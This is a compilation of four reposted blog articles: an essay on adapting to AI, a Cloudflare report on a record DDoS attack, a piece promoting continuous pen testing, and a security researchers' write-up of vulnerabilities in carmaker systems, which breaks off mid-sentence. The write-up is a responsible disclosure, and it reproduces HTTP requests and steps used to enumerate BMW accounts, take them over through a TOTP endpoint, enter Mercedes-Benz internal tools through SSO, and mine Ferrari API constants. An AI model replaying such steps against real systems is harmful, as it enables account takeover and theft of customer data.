Neural nets sitting at desks in a classroom learning math

AI is fundamental tech. For decades we have been programming by writing functions by hand. We’ve gotten quite good at structuring our code using metaphors like object-oriented programming to create logical structures that make sense in a human world, and help us organize large code bases. But fundamentally the way we define logic in a program hasn’t changed for a long time. Until now. For the first time in all of history, we can create functions in programming by training them, rather than writing them by hand. In other, slightly more technical words, we can infer a function from observations and then use it. Like babies and toddlers do. This is historic, it’s transformative and it is a fundamental breakthrough.

Funny thing is that until quite recently – around 2015 – AI had suffered many so-called “AI Winters” where there was significant interest in the field that catalyzed investment dollars, and then a setback usually caused by a reality check, that caused a winter in funding and interest. Does anyone remember the “expert systems” of the 80s? By the early 2000s AIs name had been dragged through the mud so many times that anyone doing serious research in the field used different words to describe their work, like “machine learning” or “informatics” or “knowledge systems”.

A few hardcore true believers like Yann Lecun, Yushua Bengio and Geoffrey Hinton powered through like Bilbo and Sam across The Dead Marshes and went on to win the Turing Award, which is basically the Nobel Prize of computer science and which I had the privilege of attending when Rivest, Adleman and Shamir won theirs for public key crypto. The Turing Award is a very big deal and well deserved considering how adversarial the AI environment was for a while.

So what changed? Well for one thing you’re reading this post because it’s about AI and you’re interested. And you’re interested because you recently used GPT-4, MidJourney, Dall-E or another model to create something. You’re seeing tangible results. And the reason you’re seeing results is that GPU hardware, algorithms, and an interest in the field have brought us to an inflection point where the technology is delivering results that are jaw-dropping enough to catalyze more funding, more research, and more jaw-dropping results. This cycle really picked up steam in 2015, and with the release of GPT-4 recently, has entered a phase of what I would describe as true and consistent exponential growth.

According to NVidia “LLM sizes have been increasing 10X every year for the last few years”. In two years that’s 100X. Three years from now that’s 1000X and so on. Extrapolate that out and be afraid. Or optimistic if your mind isn’t for rent and you are hopeful yet discontent. Rush lyrics aside, that pace should give you an idea of how quickly this thing is coming. And now that we’ve reached the point of inflection I mentioned, where the hardware and algorithms seem to have overcome the cycle of disappointment that AI has been stuck in for decades, I predict that you’ll see consistent and exponential growth in the field in capabilities for the foreseeable future, with a financial bubble and bust in there that won’t be of much consequence to the fundamental value of the technology.

“Thanks for the history lesson Maunder, but you brought us here with promises of telling us what to do about AI. So?”

What to do about AI

So far we’ve discussed what boom cycles look like and the kind of noise and bear traps you should be aware of. We’ve defined what AI is in fundamental terms – a function that you can train rather than hand code. And we’ve hopefully agreed that we’ve entered a period of consistent and exponential growth in the field. Now we’ll chat about how to survive and prosper in a world that looks a lot like when electricity was invented and commercialized, or the microprocessor, or the Internet.

Disruption

Goldman estimates that AI will add 7% to global GDP at a rate of about 1.5% growth per year. They also estimate that roughly two-thirds of US occupations are exposed to some degree of automation by AI. You can extrapolate this globally. That kind of global disruption is matched only by the industrial revolution or the entire recent tech revolution as a whole starting from 1980. From the same publication, “A recent study by economist David Autor cited in the report found that 60% of today’s workers are employed in occupations that didn’t exist in 1940.”. So on an optimistic note, this kind of disruption isn’t a new thing and we’ve been disrupting and adapting for some time now.

Perhaps you’re reading this because you are running a WordPress website, perhaps secured by my product, Wordfence. Which means you’re a creator of some kind. Perhaps you’re a writer, an artist, or perhaps you’re an entrepreneur creating a business out of thin air. [Yes my fellow entreps, you get to hang with the other cool creator kids too!!]. If you don’t plan on adapting at all, that makes you far more vulnerable to this coming wave than say a chef who runs a restaurant, or someone who manages real estate and rentals. And that really is the key: adaptation. So how can we adapt?

If you’re a creator, you need to become a user of AI. You’re probably already using GPT to write copy for your product catalogs on your e-commerce website, or using MidJourney (MJ) or Dall-E to create art for ad campaigns. If you’re a designer or artist, you may feel the kind of resentment this Blender artist does in the Blender subreddit.

“My Job is different now since Midjourney v5 came out last week. I am not an artist anymore, nor a 3D artist. Rn all I do is prompting, photoshopping and implementing good looking pictures. The reason I went to be a 3D artist in the first place is gone. I wanted to create form In 3D space, sculpt, create. With my own creativity. With my own hands.”

“It came over night for me. I had no choice. And my boss also had no choice. I am now able to create, rig and animate a character thats spit out from MJ in 2-3 days. Before, it took us several weeks in 3D. The difference is: I care, he does not. For my boss its just a huge time/money saver.”

While I sympathize with how hard change and disruption can be, it’s been a constant for the past couple of centuries in many fields. MidJourney has a long way to go before it can match a real-world artist, unless you’re just churning out images and letting the AI guide the design choices and are happy to work around the bugs. For MidJourney and other generative AIs to produce exactly what we want, they’re going to have to get better at understanding what exactly we want to create. And that’s where the skill comes in. You’re already seeing this with a document that someone has created listing famous photographers and examples of their look. This can be used in MJ prompts to say “in the style of” to get a specific look, but it is an incredibly rudimentary approach.

Midjourney trying to do hands

Another way to guide the MJ AI in particular is to blend photos it has generated. Again, super rudimentary, but it’s the start of having the ability to tightly specify exactly what you want and get that out of MJ. And if you need a reminder of how basic it still is, try to get MJ to generate hands. It still sucks, even at version 5.

So if you’re a creator, start getting good at using the tools now, understand their limitations, and evolve as the products evolve until you’re an expert at guiding the AI to create exactly what you want. This will help you guide your customers in explaining the limits of the current state of AI to them and where you add value, let you take immediate advantage of the use that the current tools have, and ramp up your productivity as the tools get better at taking instructions from you.

This applies to writers, artists, designers, filmmakers, photographers, screenwriters, and anyone with creative output. Get good at the tools. Get good at them now. Do it with an open mind. Know that changes aren’t permanent and that change is. (Again with sneaking in the Rush lyrics)

Adapting as a Dev

Coders! My people! We have a problem. Most of you have become users of AI. You’re users of GPT-4 via their API. You’re plugging into other generative AIs via an API. You aren’t rolling your own. And rolling your own is where all the fun is!!

A leaking Llama

Ever heard of transfer learning? You can grab a pre-trained model from Hugging Face, chop off the head – aka the final layer in the layers of neural nets, substitute it with random weights, and train the pre-trained model with your own data to take advantage of the sometimes millions of dollars that someone else already spent training their model. In fact Facebook’s LLAMA model which is one of the largest LLM’s in the world was leaked via Torrent recently.

The most important thing you need to do right now as a developer is to stop being a user of AI and become a dev of AI. GPT-4 is a shiny ball that the world will have forgotten about in a year, but it’s a very shiny and attractive ball right now that is fueling many a late-night dev chat. Remember that stat I gave you above? That LLM’s have been increasing in size at 10X per year. The current state of the art will be accessible to you on a desktop in a few years and you need to get ready for that world today.

I’m going to just go ahead and tell you what you need to do to get your AI stuff together, fast.

  • Ignore the math. Trust me on this. Most people including devs are not good at math and it intimidates the hell out of them. AI is just matrix multiplication and addition using GPU cores to parallelize the ops. Expressing this as code is easy. Expressing it as math will make you hide under your bed and cry. Ignore the math. If you can code, you’ll get it.
  • Learn Python. Everything in AI is Python. It’s a beautiful little language that you’ll come to appreciate very quickly if you’re already a dev. It’s like coming over to Aikido if you’re already a black belt. OK the MMA scene kinda messed up my metaphor proving that Aikido is actually worthless, but whatever.
  • Then go do the Practical Deep Learning for Coders course at fast.ai. It’s how we get our guys up to speed fast in the field and it’s brilliant. Jeremy Howard does a spectacular job of getting you up to speed fast in the field by immediately getting you productive and then unpacking the details in a fun non-mathy way.
  • As you progress in the course, definitely get up to speed using Jupyter Notebooks and I’d recommend Kaggle for this. They were bought by Google a few years ago and kind of compete with Google’s own notebook system called Colab, but I prefer Kaggle. You get GPU access by simply verifying your email address and it’s free which is kind of amazing. So you can use a rich text environment on Kaggle to write your code, see the output and run it on some fairly decent GPUs. Kaggle GPU’s perform at about 20% of the speed of my laptop RTX 4090 in case you’re curious about benchmarks.

The course teaches fundamentals, how to use pre-trained models, how to create Jupyter Notebooks or fork others, how to create Hugging Face Spaces, and how to share your models and their output with the world. It is the fastest way right now to transform yourself from an AI user into an AI dev and get drinks bought for you at parties by folks that have not yet made the leap.

Alright, this went long but that was the plan. We’ll talk more about AI. Go forth, be brave, learn, and create!

Mark Maunder – Founder & CEO – Wordfence and Defiant Inc.

Footnotes: All images on the page were created with MidJourney and if you’d like to see the prompt I used, simply view the image in a new tab and the image name is the prompt, all except for the heavy metal hands image which a colleague created. I’ll be in the comments in case there’s discussion.

Did you enjoy this post? Share it!

Source :
https://www.wordfence.com/blog/2023/04/friday-long-read-what-to-do-about-ai/

Cloudflare mitigates record-breaking 71 million request-per-second DDoS attack

This was a weekend of record-breaking DDoS attacks. Over the weekend, Cloudflare detected and mitigated dozens of hyper-volumetric DDoS attacks. The majority of attacks peaked in the ballpark of 50-70 million requests per second (rps) with the largest exceeding 71 million rps. This is the largest reported HTTP DDoS attack on record, more than 35% higher than the previous reported record of 46M rps in June 2022.

The attacks were HTTP/2-based and targeted websites protected by Cloudflare. They originated from over 30,000 IP addresses. Some of the attacked websites included a popular gaming provider, cryptocurrency companies, hosting providers, and cloud computing platforms. The attacks originated from numerous cloud providers, and we have been working with them to crack down on the botnet.

Record breaking attack: DDoS attack exceeding 71 million requests per second

Over the past year, we’ve seen more attacks originate from cloud computing providers. For this reason, we will be providing service providers that own their own autonomous system a free Botnet threat feed. The feed will provide service providers threat intelligence about their own IP space; attacks originating from within their autonomous system. Service providers that operate their own IP space can now sign up to the early access waiting list.

No. This campaign of attacks arrives less than two weeks after the Killnet DDoS campaign that targeted healthcare websites. Based on the methods and targets, we do not believe that these recent attacks are related to the healthcare campaign. Furthermore, yesterday was the US Super Bowl, and we also do not believe that this attack campaign is related to the game event.

What are DDoS attacks?

Distributed Denial of Service attacks are cyber attacks that aim to take down Internet properties and make them unavailable for users. These types of cyberattacks can be very efficient against unprotected websites and they can be very inexpensive for the attackers to execute.

An HTTP DDoS attack usually involves a flood of HTTP requests towards the target website. The attacker’s objective is to bombard the website with more requests than it can handle. Given a sufficiently high amount of requests, the website’s server will not be able to process all of the attack requests along with the legitimate user requests. Users will experience this as website-load delays, timeouts, and eventually not being able to connect to their desired websites at all.

Illustration of a DDoS attack

To make attacks larger and more complicated, attackers usually leverage a network of bots — a botnet. The attacker will orchestrate the botnet to bombard the victim’s websites with HTTP requests. A sufficiently large and powerful botnet can generate very large attacks as we’ve seen in this case.

However, building and operating botnets requires a lot of investment and expertise. What is the average Joe to do? Well, an average Joe that wants to launch a DDoS attack against a website doesn’t need to start from scratch. They can hire one of numerous DDoS-as-a-Service platforms for as little as $30 per month. The more you pay, the larger and longer of an attack you’re going to get.

Why DDoS attacks?

Over the years, it has become easier, cheaper, and more accessible for attackers and attackers-for-hire to launch DDoS attacks. But as easy as it has become for the attackers, we want to make sure that it is even easier – and free – for defenders of organizations of all sizes to protect themselves against DDoS attacks of all types.

Unlike Ransomware attacks, Ransom DDoS attacks don’t require an actual system intrusion or a foothold within the targeted network. Usually Ransomware attacks start once an employee naively clicks an email link that installs and propagates the malware. There’s no need for that with DDoS attacks. They are more like a hit-and-run attack. All a DDoS attacker needs to know is the website’s address and/or IP address.

Is there an increase in DDoS attacks?

Yes. The size, sophistication, and frequency of attacks has been increasing over the past months. In our latest DDoS threat report, we saw that the amount of HTTP DDoS attacks increased by 79% year-over-year. Furthermore, the amount of volumetric attacks exceeding 100 Gbps grew by 67% quarter-over-quarter (QoQ), and the number of attacks lasting more than three hours increased by 87% QoQ.

But it doesn’t end there. The audacity of attackers has been increasing as well. In our latest DDoS threat report, we saw that Ransom DDoS attacks steadily increased throughout the year. They peaked in November 2022 where one out of every four surveyed customers reported being subject to Ransom DDoS attacks or threats.

Distribution of Ransom DDoS attacks by month

Should I be worried about DDoS attacks?

Yes. If your website, server, or networks are not protected against volumetric DDoS attacks using a cloud service that provides automatic detection and mitigation, we really recommend that you consider it.

Cloudflare customers shouldn’t be worried, but should be aware and prepared. Below is a list of recommended steps to ensure your security posture is optimized.

What steps should I take to defend against DDoS attacks?

Cloudflare’s systems have been automatically detecting and mitigating these DDoS attacks.

Cloudflare offers many features and capabilities that you may already have access to but may not be using. So as extra precaution, we recommend taking advantage of these capabilities to improve and optimize your security posture:

  1. Ensure all DDoS Managed Rules are set to default settings (High sensitivity level and mitigation actions) for optimal DDoS activation.
  2. Cloudflare Enterprise customers that are subscribed to the Advanced DDoS Protection service should consider enabling Adaptive DDoS Protection, which mitigates attacks more intelligently based on your unique traffic patterns.
  3. Deploy firewall rules and rate limiting rules to enforce a combined positive and negative security model. Reduce the traffic allowed to your website based on your known usage.
  4. Ensure your origin is not exposed to the public Internet (i.e., only enable access to Cloudflare IP addresses). As an extra security precaution, we recommend contacting your hosting provider and requesting new origin server IPs if they have been targeted directly in the past.
  5. Customers with access to Managed IP Lists should consider leveraging those lists in firewall rules. Customers with Bot Management should consider leveraging the threat scores within the firewall rules.
  6. Enable caching as much as possible to reduce the strain on your origin servers, and when using Workers, avoid overwhelming your origin server with more subrequests than necessary.
  7. Enable DDoS alerting to improve your response time.

Preparing for the next DDoS wave

Defending against DDoS attacks is critical for organizations of all sizes. While attacks may be initiated by humans, they are executed by bots — and to play to win, you must fight bots with bots. Detection and mitigation must be automated as much as possible, because relying solely on humans to mitigate in real time puts defenders at a disadvantage. Cloudflare’s automated systems constantly detect and mitigate DDoS attacks for our customers, so they don’t have to. This automated approach, combined with our wide breadth of security capabilities, lets customers tailor the protection to their needs.

We’ve been providing unmetered and unlimited DDoS protection for free to all of our customers since 2017, when we pioneered the concept. Cloudflare’s mission is to help build a better Internet. A better Internet is one that is more secure, faster, and reliable for everyone – even in the face of DDoS attacks.

We protect entire corporate networks, help customers build Internet-scale applications efficiently, accelerate any website or Internet applicationward off DDoS attacks, keep hackers at bay, and can help you on your journey to Zero Trust.

Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.

To learn more about our mission to help build a better Internet, start here. If you’re looking for a new career direction, check out our open positions.

Source :
https://blog.cloudflare.com/cloudflare-mitigates-record-breaking-71-million-request-per-second-ddos-attack/

Is Once-Yearly Pen Testing Enough for Your Organization?

Any organization that handles sensitive data must be diligent in its security efforts, which include regular pen testing. Even a small data breach can result in significant damage to an organization’s reputation and bottom line.

There are two main reasons why regular pen testing is necessary for secure web application development:

  • Security: Web applications are constantly evolving, and new vulnerabilities are being discovered all the time. Pen testing helps identify vulnerabilities that could be exploited by hackers and allows you to fix them before they can do any damage.
  • Compliance: Depending on your industry and the type of data you handle, you may be required to comply with certain security standards (e.g., PCI DSS, NIST, HIPAA). Regular pen testing can help you verify that your web applications meet these standards and avoid penalties for non-compliance.

How Often Should You Pentest?#

Many organizations, big and small, have once a year pen testing cycle. But what’s the best frequency for pen testing? Is once a year enough, or do you need to be more frequent?

The answer depends on several factors, including the type of development cycle you have, the criticality of your web applications, and the industry you’re in.

You may need more frequent pen testing if:

You Have an Agile or Continuous Release Cycle#

Agile development cycles are characterized by short release cycles and rapid iterations. This can make it difficult to keep track of changes made to the codebase and makes it more likely that security vulnerabilities will be introduced.

If you’re only testing once a year, there’s a good chance that vulnerabilities will go undetected for long periods of time. This could leave your organization open to attack.

To mitigate this risk, pen testing cycles should align with the organization’s development cycle. For static web applications, testing every 4-6 months should be sufficient. But for web applications that are updated frequently, you may need to test more often, such as monthly or even weekly.

Your Web Applications Are Business-Critical#

Any system that is essential to your organization’s operations should be given extra attention when it comes to security. This is because a breach of these systems could have a devastating impact on your business. If your organization relies heavily on its web applications to do business, any downtime could result in significant financial losses.

For example, imagine that your organization’s e-commerce site went down for an hour due to a DDoS attack. Not only would you lose out on potential sales, but you would also have to deal with the cost of the attack and the negative publicity.

To avoid this scenario, it’s important to ensure that your web applications are always available and secure.

Non-critical web applications can usually get away with being tested once a year, but business-critical web applications should be tested more frequently to ensure they are not at risk of a major outage or data loss.

Your Web Applications Are Customer-Facing#

If all your web applications are internal, you may be able to get away with pen testing less frequently. However, if your web applications are accessible to the public, you must be extra diligent in your security efforts.

Web applications accessible to external traffic are more likely to be targeted by attackers. This is because there is a greater pool of attack vectors and more potential entry points for an attacker to exploit.

Customer-facing web applications also tend to have more users, which means that any security vulnerabilities will be exploited more quickly. For example, a cross-site scripting (XSS) vulnerability in an external web application with millions of users could be exploited within hours of being discovered.

To protect against these threats, it’s important to pen test customer-facing web applications more frequently than internal ones. Depending on the size and complexity of the application, you may need to pen test every month or even every week.

You Are in a High-Risk Industry#

Certain industries are more likely to be targeted by hackers due to the sensitive nature of their data. Healthcare organizations, for example, are often targeted because of the protected health information (PHI) they hold.

If your organization is in a high-risk industry, you should consider conducting pen testing more frequently to ensure that your systems are secure and meet regulatory compliance. This will help protect your data and reduce the chances of a costly security incident.

You Don’t Have Internal Security Operations or a Pen testing Team#

This might sound counterintuitive, but if you don’t have an internal security team, you may need to conduct pen testing more frequently.

Organizations that don’t have dedicated security staff are more likely to be vulnerable to attacks.

Without an internal security team, you will need to rely on external pen testers to assess your organization’s security posture.

Depending on the size and complexity of your organization, you may need to pen test every month or even every week.

You Are Focused on Mergers or Acquisitions#

During a merger or acquisition, there is often a lot of confusion and chaos. This can make it difficult to keep track of all the systems and data that need to be secured. As a result, it’s important to conduct pen testing more frequently during these times to ensure that all systems are secure.

M&A also means that you are adding new web applications to your organization’s infrastructure. These new applications may have unknown security vulnerabilities that could put your entire organization at risk.

In 2016, Marriott acquired Starwood without being aware that hackers had exploited a flaw in Starwood’s reservation system two years earlier. Over 500 million customer records were compromised. This placed Marriott in hot water with the British watchdog ICO, resulting in 18.4 million pounds in fines in the UK. According to Bloomberg, there is more trouble ahead, as the hotel giant could “face up to $1 billion in regulatory fines and litigation costs.”

To protect against these threats, it’s important to conduct pen testing before and after an acquisition. This will help you identify potential security issues so they can be fixed before the transition is complete.

The Importance of Continuous Pen Testing#

While periodic pen testing is important, it is no longer enough in today’s world. As businesses rely more on their web applications, continuous pen testing becomes increasingly important.

There are two main types of pen testing: time-boxed and continuous.

Traditional pen testing is done on a set schedule, such as once a year. This type of pen testing is no longer enough in today’s world, as businesses rely more on their web applications.

Continuous pen testing is the process of continuously scanning your systems for vulnerabilities. This allows you to identify and fix vulnerabilities before they can be exploited by attackers. Continuous pen testing allows you to find and fix security issues as they happen instead of waiting for a periodic assessment.

Continuous pen testing is especially important for organizations that have an agile development cycle. Since new code is deployed frequently, there is a greater chance for security vulnerabilities to be introduced.

Pen testing as a service models is where continuous pen testing shine. Outpost24’s PTaaS (Penetration-Testing-as-a-Service) platform enables businesses to conduct continuous pen testing with ease. The Outpost24 platform is always up-to-date with an organization’s latest security threats and vulnerabilities, so you can be confident that your web applications are secure.

  • Manual and automated pen testing: Outpost24’s PTaaS platform combines manual and automated pen testing to give you the best of both worlds. This means you can find and fix vulnerabilities faster while still getting the benefits of expert analysis.
  • Provides comprehensive coverage: Outpost24’s platform covers all OWASP Top 10 vulnerabilities and more. This means that you can be confident that your web applications are secure against the latest threats.
  • Is cost-effective: With Outpost24, you only pay for the services you need. This makes it more affordable to conduct continuous pen testing, even for small businesses.

The Bottom Line#

Regular pen testing is essential for secure web application development. Depending on your organization’s size, industry, and development cycle, you may need to revise your pen testing schedule.

Once-a-year pen testing cycle may be enough for some organizations, but for most, it is not. For business-critical, customer-facing, or high-traffic web applications, you should consider continuous pen testing.

Outpost24’s PTaaS platform makes it easy and cost-effective to conduct continuous pen testing. Contact us today to learn more about our platform and how we can help you secure your web applications.

Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post.

Source :
https://thehackernews.com/2023/01/is-once-yearly-pen-testing-enough-for.html

Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More

During the fall of 2022, a few friends and I took a road trip from Chicago, IL to Washington, DC to attend a cybersecurity conference and (try) to take a break from our usual computer work.

While we were visiting the University of Maryland, we came across a fleet of electric scooters scattered across the campus and couldn’t resist poking at the scooter’s mobile app. To our surprise, our actions caused the horns and headlights on all of the scooters to turn on and stay on for 15 minutes straight.

https://youtube.com/watch?v=YRAy3wv5SCk%3Ffeature%3Doembed

When everything eventually settled down, we sent a report over to the scooter manufacturer and became super interested in trying to more ways to make more things honk. We brainstormed for a while, and then realized that nearly every automobile manufactured in the last 5 years had nearly identical functionality. If an attacker were able to find vulnerabilities in the API endpoints that vehicle telematics systems used, they could honk the horn, flash the lights, remotely track, lock/unlock, and start/stop vehicles, completely remotely.

At this point, we started a group chat and all began to work with the goal of finding vulnerabilities affecting the automotive industry. Over the next few months, we found as many car-related vulnerabilities as we could. The following writeup details our work exploring the security of telematic systems, automotive APIs, and the infrastructure that supports it.

Findings Summary

During our engagement, we found the following vulnerabilities in the companies listed below:

  • Kia, Honda, Infiniti, Nissan, Acura
    • Fully remote lock, unlock, engine start, engine stop, precision locate, flash headlights, and honk vehicles using only the VIN number
    • Fully remote account takeover and PII disclosure via VIN number (name, phone number, email address, physical address)
    • Ability to lock users out of remotely managing their vehicle, change ownership
      • For Kia’s specifically, we could remotely access the 360-view camera and view live images from the car
  • Mercedes-Benz
    • Access to hundreds of mission-critical internal applications via improperly configured SSO, including…
      • Multiple Github instances behind SSO
      • Company-wide internal chat tool, ability to join nearly any channel
      • SonarQube, Jenkins, misc. build servers
      • Internal cloud deployment services for managing AWS instances
      • Internal Vehicle related APIs
    • Remote Code Execution on multiple systems
    • Memory leaks leading to employee/customer PII disclosure, account access
  • Hyundai, Genesis
    • Fully remote lock, unlock, engine start, engine stop, precision locate, flash headlights, and honk vehicles using only the victim email address
    • Fully remote account takeover and PII disclosure via victim email address (name, phone number, email address, physical address)
    • Ability to lock users out of remotely managing their vehicle, change ownership
  • BMW, Rolls Royce
    • Company-wide core SSO vulnerabilities which allowed us to access any employee application as any employee, allowed us to…
      • Access to internal dealer portals where you can query any VIN number to retrieve sales documents for BMW
      • Access any application locked behind SSO on behalf of any employee, including applications used by remote workers and dealerships
  • Ferrari
    • Full zero-interaction account takeover for any Ferrari customer account
    • IDOR to access all Ferrari customer records
    • Lack of access control allowing an attacker to create, modify, delete employee “back office” administrator user accounts and all user accounts with capabilities to modify Ferrari owned web pages through the CMS system
    • Ability to add HTTP routes on api.ferrari.com (rest-connectors) and view all existing rest-connectors and secrets associated with them (authorization headers)
  • Spireon
  • Ford
    • Full memory disclosure on production vehicle Telematics API discloses
      • Discloses customer PII and access tokens for tracking and executing commands on vehicles
      • Discloses configuration credentials used for internal services related to Telematics
      • Ability to authenticate into customer account and access all PII and perform actions against vehicles
    • Customer account takeover via improper URL parsing, allows an attacker to completely access victim account including vehicle portal
  • Reviver
    • Full super administrative access to manage all user accounts and vehicles for all Reviver connected vehicles. An attacker could perform the following:
      • Track the physical GPS location and manage the license plate for all Reviver customers (e.g. changing the slogan at the bottom of the license plate to arbitrary text)
      • Update any vehicle status to “STOLEN” which updates the license plate and informs authorities
      • Access all user records, including what vehicles people owned, their physical address, phone number, and email address
      • Access the fleet management functionality for any company, locate and manage all vehicles in a fleet
  • Porsche
    • Ability to send retrieve vehicle location, send vehicle commands, and retrieve customer information via vulnerabilities affecting the vehicle Telematics service
  • Toyota
    • IDOR on Toyota Financial that discloses the name, phone number, email address, and loan status of any Toyota financial customers
  • Jaguar, Land Rover
    • User account IDOR disclosing password hash, name, phone number, physical address, and vehicle information
  • SiriusXM
    • Leaked AWS keys with full organizational read/write S3 access, ability to retrieve all files including (what appeared to be) user databases, source code, and config files for Sirius

Vulnerability Writeups

(1) Full Account Takeover on BMW and Rolls Royce via Misconfigured SSO

While testing BMW assets, we identified a custom SSO portal for employees and contractors of BMW. This was super interesting to us, as any vulnerabilities identified here could potentially allow an attacker to compromise any account connected to all of BMWs assets.

For instance, if a dealer wanted to access the dealer portal at a physical BMW dealership, they would have to authenticate through this portal. Additionally, this SSO portal was used to access internal tools and related devops infrastructure.

The first thing we did was fingerprint the host using OSINT tools like gau and ffuf. After a few hours of fuzzing, we identified a WADL file which exposed API endpoints on the host via sending the following HTTP request:

GET /rest/api/application.wadl HTTP/1.1
Host: xpita.bmwgroup.com

The HTTP response contained all available REST endpoints on the xpita host. We began enumerating the endpoints and sending mock HTTP requests to see what functionality was available.

One immediate finding was that we were able to query all BMW user accounts via sending asterisk queries in the user field API endpoint. This allowed us to enter something like “sam*” and retrieve the user information for a user named “sam.curry” without having to guess the actual username.

HTTP Request

GET /reset/api/users/example* HTTP/1.1
Host: xpita.bmwgroup.com

HTTP Response

HTTP/1.1 200 OK
Content-type: application/json

{“id”:”redacted”,”firstName”:”Example”,”lastName”:”User”,”userName”:”example.user”}

Once we found this vulnerability, we continued testing the other accessible API endpoints. One particularly interesting one which stood out immediately was the “/rest/api/chains/accounts/:user_id/totp” endpoint. We noticed the word “totp” which usually stood for one-time password generation.

When we sent an HTTP request to this endpoint using the SSO user ID gained from the wildcard query paired with the TOTP endpoint, it returned a random 7-digit number. The following HTTP request and response demonstrate this behavior:

HTTP Request

GET /rest/api/chains/accounts/unique_account_id/totp HTTP/1.1
Host: xpita.bmwgroup.com

HTTP Response

HTTP/1.1 200 OK
Content-type: text/plain

9373958

For whatever reason, it appeared that this HTTP request would generate a TOTP for the user’s account. We guessed that this interaction worked with the “forgot password” functionality, so we found an example user account by querying “example*” using our original wildcard finding and retrieving the victim user ID. After retrieving this ID, we initiated a reset password attempt for the user account until we got to the point where the system requested a TOTP code from the user’s 2FA device (e.g. email or phone).

At this point, we retrieved the TOTP code generated from the API endpoint and entered it into the reset password confirmation field.

It worked! We had reset a user account, gaining full account takeover on any BMW employee and contractor user.

At this point, it was possible to completely take over any BMW or Rolls Royce employee account and access tools used by those employees.

To demonstrate the impact of the vulnerability, we simply Googled “BMW dealer portal” and used our account to access the dealer portal used by sales associates working at physical BMW and Rolls Royce dealerships.

After logging in, we observed that the demo account we took over was tied to an actual dealership, and we could access all of the functionality that the dealers themselves had access to. This included the ability to query a specific VIN number and retrieve sales documents for the vehicle.

With our level of access, there was a huge amount of functionality we could’ve performed against BMW and Rolls Royce customer accounts and customer vehicles. We stopped testing at this point and reported the vulnerability.

The vulnerabilities reported to BMW and Rolls Royce have since been fixed.

(2) Remote Code Execution and Access to Hundreds of Internal Tools on Mercedes-Benz and Rolls Royce via Misconfigured SSO

Early in our testing, someone in our group had purchased a Mercedes-Benz vehicle and so we began auditing the Mercedes-Benz infrastructure. We took the same approach as BMW and began testing the Mercedes-Benz employee SSO.

We weren’t able to find any vulnerabilities affecting the SSO portal itself, but by exploring the SSO website we observed that they were running some form of LDAP for the employee accounts. Based on our high level understanding of their infrastructure, we guessed that the individual employee applications used a centralized LDAP system to authenticate users. We began exploring each of these websites in an attempt to find a public registration so we could gain SSO credentials to access, even at a limited level, the employee applications.

After fuzzing random sites for a while, we eventually found the “umas.mercedes-benz.com” website which was built for vehicle repair shops to request specific tools access from Mercedes-Benz. The website had public registration enabled as it was built for repair shops and appeared to write to the same database as the core employee LDAP system.

We filled out all the required fields for registration, created a user account, then used our recon data to identify sites which redirected to the Mercedes-Benz SSO. The first one we attempted was a pretty obvious employee tool, it was “git.mercedes-benz.com”, short for Github. We attempted to use our user credentials to sign in to the Mercedes-Benz Github and saw that we were able to login. Success!

The Mercedes-Benz Github, after authenticating, asked us to set up 2FA on our account so we could access the app. We installed the 2FA app and added it to our account, entered our code, then saw that we were in. We had access to “git.mercedes-benz.com” and began looking around.

After a few minutes, we saw that the Github instance had internal documentation and source code for various Mercedes-Benz projects including the Mercedes Me Connect app which was used by customers to remotely connect to their vehicles. The internal documentation gave detailed instructions for employees to follow if they wanted to build an application for Mercedes-Benz themselves to talk to customer vehicles and the specific steps one would have to take to talk to customer vehicles.

At this point, we reported the vulnerability, but got some pushback after a few days of waiting on an email response. The team seemed to misunderstand the impact, so they asked us to demonstrate further impact.

We used our employee account to login to numerous applications which contained sensitive information and achieved remote code execution via exposed actuators, spring boot consoles, and dozens of sensitive internal applications used by Mercedes-Benz employees. One of these applications was the Mercedes-Benz Mattermost (basically Slack). We had permission to join any channel, including security channels, and could pose as a Mercedes-Benz employee who could ask whatever questions necessary for an actual attacker to elevate their privileges across the Benz infrastructure.

To give an overview, we could access the following services:

  • Multiple employee-only Githubs with sensitive information containing documentation and configuration files for multiple applications across the Mercedes-Benz infrastructure
  • Spring boot actuators which lead to remote code execution, information disclosure, on sensitive employee and customer facing applications
    Jenkins instances
  • AWS and cloud-computing control panels where we could request, manage, and access various internal systems
  • XENTRY systems used to communicate with customer vehicles
  • Internal OAuth and application-management related functionality for configuring and managing internal apps
  • Hundreds of miscellaneous internal services

(3) Full Account Takeover on Ferrari and Arbitrary Account Creation allows Attacker to Access, Modify, and Delete All Customer Information and Access Administrative CMS Functionality to Manage Ferrari Websites

When we began targeting Ferrari, we mapped out all domains under the publicly available domains like “ferrari.com” and browsed around to see what was accessible. One target we found was “api.ferrari.com”, a domain which offered both customer facing and internal APIs for Ferrari systems. Our goal was to get the highest level of access possible for this API.

We analyzed the JavaScript present on several Ferrari subdomains that looked like they were for use by Ferrari dealers. These subdomains included `cms-dealer.ferrari.com`, `cms-new.ferrari.com` and `cms-dealer.test.ferrari.com`.

One of the patterns we notice when testing web applications is poorly implemented single sign on functionality which does not restrict access to the underlying application. This was the case for the above subdomains. It was possible to extract the JavaScript present for these applications, allowing us to understand the backend API routes in use.

When reverse engineering JavaScript bundles, it is important to check what constants have been defined for the application. Often these constants contain sensitive credentials or at the very least, tell you where the backend API is, that the application talks to.

For this application, we noticed the following constants were set:

const i = {
                        production: !0,
                        envName: "production",
                        version: "0.0.0",
                        build: "20221223T162641363Z",
                        name: "ferrari.dws-preowned.backoffice",
                        formattedName: "CMS SPINDOX",
                        feBaseUrl: "https://{{domain}}.ferraridealers.com/",
                        fePreownedBaseUrl: "https://{{domain}}.ferrari.com/",
                        apiUrl: "https://api.ferrari.com/cms/dws/back-office/",
                        apiKey: "REDACTED",
                        s3Bucket: "ferrari-dws-preowned-pro",
                        cdnBaseUrl: "https://cdn.ferrari.com/cms/dws/media/",
                        thronAdvUrl: "https://ferrari-app-gestioneautousate.thron.com/?fromSAML#/ad/"
                    }

From the above constants we can understand that the base API URL is `https://api.ferrari.com/cms/dws/back-office/` and a potential API key for this API is `REDACTED`.

Digging further into the JavaScript we can look for references to `apiUrl` which will inform us as to how this API is called and how the API key is being used. For example, the following JavaScript sets certain headers if the API URL is being called:

